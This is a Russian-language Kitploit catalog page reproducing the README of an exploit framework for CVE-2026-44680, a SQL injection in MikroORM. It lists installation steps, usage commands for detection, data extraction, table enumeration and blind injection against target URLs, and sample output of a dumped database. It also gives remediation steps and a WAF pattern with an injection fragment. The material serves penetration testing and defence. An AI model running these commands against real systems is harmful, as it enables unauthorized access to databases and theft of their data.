Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-44680-MikroORM-SQL-Injection-Exploit-Framework — PoC-инструмент для CVE-2026-44680, затрагивающего MikroORM ≤7.0.13. Эксплуатирует инъекцию в JSON path для извлечения содержимого базы данных с помощью UNION-based атак. Включает обнаружение уязвимостей, автоматизированное извлечение данных, перечисление таблиц и поддержку слепых инъекций. Также включает интеграцию с прокси для Burp Suite и методы обхода WAF. | Kitploit
Инструменты/GitHubGitHub/cerberusmrxi/cve-2026-44680-mikroorm-sql-injection-exploit-framework
Фреймворки для пентестаСканеры уязвимостейАнализ КодаЭксплуатацияВеб-безопасностьБезопасность Баз Данных
GitHubcerberusmrxi/cve-2026-44680-mikroorm-sql-injection-exploit-framework

CVE-2026-44680-MikroORM-SQL-Injection-Exploit-Framework

Репозиторий
1201 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

PoC-инструмент для CVE-2026-44680, затрагивающего MikroORM ≤7.0.13. Эксплуатирует инъекцию в JSON path для извлечения содержимого базы данных с помощью UNION-based атак. Включает обнаружение уязвимостей, автоматизированное извлечение данных, перечисление таблиц и поддержку слепых инъекций. Также включает интеграцию с прокси для Burp Suite и методы обхода WAF.

Поделиться

CVE-2026-44680 — Эксплойт-фреймворк для SQL-инъекций MikroORM

Python Version License Status CVSS

Профессиональный Proof-of-Concept инструмент для исследователей безопасности


🔍 Обзор

CVE-2026-44680 — критическая уязвимость SQL-инъекции, затрагивающая MikroORM, популярную TypeScript-ORM для Node.js. Этот эксплойт-фреймворк предоставляет исследователям безопасности и специалистам по пентесту профессиональный инструмент для обнаружения и эксплуатации уязвимости.

Автор: Sudeepa Wanigarathna
Версия: 1.0.0
Классификация: Профессиональный инструмент для исследований в области безопасности


🚨 Детали уязвимости

АтрибутЗначение
CVE IDCVE-2026-44680
Оценка CVSS7.6 (Высокий)
Вектор атакиСеть
Сложность атакиНизкая
Требуемые привилегииНизкие

Затронутые версии

  • @mikro-orm/knex <= 6.6.13
  • @mikro-orm/sql <= 7.0.13

Первопричина

MikroORM не выполняет корректное экранирование ключей JSON-путей, управляемых во время выполнения, при построении запросов JSON_EXTRACT. Злоумышленники могут выйти за пределы контекста JSON-пути и внедрить произвольный SQL-код.


✨ Возможности

ВозможностьОписаниеСтатус
Обнаружение уязвимостиОбнаружение на основе времени и ошибок✅
Извлечение данных БДВерсия, база данных, пользователь, имя хоста✅
Перечисление таблицАвтоматическое обнаружение всех таблиц✅
Инъекция на основе UNIONИзвлечение данных через UNION SELECT✅
Слепая инъекцияИзвлечение символов на основе булевых условий✅
Поддержка проксиBurp Suite / перехватывающий прокси✅
Генерация отчётовПрофессиональные TXT-отчёты✅
Обход WAFПродвинутые методы обфускации✅

📦 Установка

Предварительные требования

root@kitploit:~
# Python 3.8 or higher
python3 --version

# pip package manager
pip --version

Шаги установки

Шаг 1: Клонирование репозитория

root@kitploit:~
git clone https://github.com/CerberusMrXi/CVE-2026-44680-MikroORM-SQL-Injection-Exploit-Framework
cd CVE-2026-44680-exploit

Шаг 2: Установка зависимостей

root@kitploit:~
# Using requirements.txt
pip install -r requirements.txt

# Or install manually
pip install requests colorama tqdm urllib3 simplejson

Шаг 3: Проверка установки

root@kitploit:~
python exploit.py --help

requirements.txt

root@kitploit:~
requests>=2.31.0
colorama>=0.4.6
tqdm>=4.65.0
urllib3>=2.0.0
simplejson>=3.19.0

🚀 Быстрый старт

Базовое использование

root@kitploit:~
# Full exploitation
python exploit.py -u http://localhost:3000

# Vulnerability detection only
python exploit.py -u http://target.com --detect

# Extract database information
python exploit.py -u http://target.com --extract

# Enumerate tables
python exploit.py -u http://target.com --enumerate

📖 Руководство по использованию

Параметры команд

ФлагОписаниеПо умолчанию
-u, --urlЦелевой URL (обязательно)-
-e, --endpointAPI-эндпоинт/api/users/search
-p, --proxyHTTP-проксиНет
-v, --verboseПодробный выводЛожь
--detectТолько обнаружение уязвимостиЛожь
--extractИзвлечение информации о БДЛожь
--enumerateПеречисление таблицЛожь
--blindРежим слепой инъекцииЛожь

Примеры команд

1. Полная эксплуатация

root@kitploit:~
python exploit.py -u http://192.168.1.100:3000

2. Пользовательский эндпоинт

root@kitploit:~
python exploit.py -u http://target.com -e /api/v2/users/query

3. С прокси (Burp Suite)

root@kitploit:~
python exploit.py -u http://target.com -p http://127.0.0.1:8080

4. Подробная отладка

root@kitploit:~
python exploit.py -u http://target.com -v --extract

5. Слепая инъекция

root@kitploit:~
python exploit.py -u http://target.com --blind

6. Только обнаружение

root@kitploit:~
python exploit.py -u http://target.com --detect

7. Извлечение информации о БД

root@kitploit:~
python exploit.py -u http://target.com --extract

8. Перечисление таблиц

root@kitploit:~
python exploit.py -u http://target.com --enumerate

📊 Примеры вывода

Вывод в консоль

root@kitploit:~
============================================================
  MikroORM CVE-2026-44680 Exploitation Framework
  Author: Sudeepa Wanigarathna
============================================================

[*] Performing vulnerability detection on /api/users/search
[+] Vulnerable to time-based SQL injection

[+] Vulnerability confirmed!

[*] Extracting database information...
[*] Enumerating tables...
[+] Found table: users
[+] Found table: products
[+] Found table: orders
[+] Found table: payments
[+] Found table: admin

===== MIKROORM CVE-2026-44680 EXPLOITATION REPORT =====
Author: Sudeepa Wanigarathna (Security Researcher)
Date: 2026-07-20 14:30:45
Target: http://localhost:3000

[*] VULNERABILITY DETAILS
    - CVE: CVE-2026-44680
    - CVSS Score: 7.6 (High)
    - Affected Components: @mikro-orm/knex <= 6.6.13

[*] DATABASE INFORMATION
    - Version: 10.11.6-MariaDB
    - Database: production_db
    - User: root@localhost
    - Hostname: localhost

[*] ENUMERATED TABLES (5 found)
    1. users
    2. products
    3. orders
    4. payments
    5. admin

[+] Report saved to exploit_report_1742493645.txt
[+] Table list saved to tables_1742493645.txt

Сгенерированные файлы

root@kitploit:~
exploit_report_1742493645.txt  # Complete exploitation report
tables_1742493645.txt          # List of discovered tables

🛡️ Меры по устранению

Немедленные действия

1. Обновление MikroORM

root@kitploit:~
npm install @mikro-orm/knex@latest
npm install @mikro-orm/sql@latest

2. Проверка входных данных

root@kitploit:~
const ALLOWED_JSON_PATHS = ['$.email', '$.name', '$.metadata'];

function validateJsonPath(key) {
    if (!ALLOWED_JSON_PATHS.includes(key)) {
        throw new Error('Invalid JSON path');
    }
    return key;
}

3. Правила WAF

root@kitploit:~
# Block suspicious JSON path patterns
"filterField": "\$\.x'\) OR .* -- "

4. Укрепление базы данных

  • Применяйте принцип минимальных привилегий
  • Используйте отдельных пользователей базы данных
  • Включите журналирование запросов
  • Включите обнаружение SQL-инъекций

⚠️ Отказ от ответственности

ВАЖНО: Этот инструмент предназначен только для авторизованного тестирования безопасности и образовательных целей.

Правовое уведомление

  • ✅ Вы ОБЯЗАНЫ получить явное разрешение перед тестированием любой системы
  • ✅ Вы несёте ответственность за любой ущерб, причинённый в результате неправомерного использования
  • ✅ Используйте этично и ответственно сообщайте об уязвимостях

Рекомендации по этичному использованию

  1. Авторизация: Получите письменное разрешение от владельца системы
  2. Сообщение об уязвимостях: Ответственно сообщайте о находках затронутым поставщикам
  3. Конфиденциальность: Не раскрывайте уязвимости до выхода исправлений
  4. Ограничения: Не выходите за рамки авторизованного тестирования

📄 Лицензия

Этот проект распространяется под лицензией MIT.

root@kitploit:~
MIT License

Copyright (c) 2026 Sudeepa Wanigarathna

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
...

📚 Ссылки

  • Подробности CVE-2026-44680
  • Бюллетень безопасности MikroORM
  • Предотвращение SQL-инъекций OWASP

Сделано с ❤️ для сообщества исследователей безопасности

Сообщить об ошибке • Запросить функцию • Поставить звезду на GitHub

Скачать инструмент